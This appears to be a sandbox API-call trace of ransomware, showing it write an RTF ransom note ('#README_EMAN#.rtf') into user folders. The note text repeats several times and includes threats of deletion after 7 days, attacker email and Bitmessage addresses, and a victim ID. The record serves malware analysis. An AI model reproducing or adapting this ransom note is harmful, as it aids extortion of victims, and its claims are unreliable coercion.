;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235cca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0294.061] WriteFile (in: hFile=0x2d4, lpBuffer=0x235cca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235cca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.061] CloseHandle (hObject=0x2d4) returned 1 [0294.061] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\#readme_eman#.rtf")) returned 0xffffffff [0294.061] GetLastError () returned 0x2 [0294.062] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0294.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED 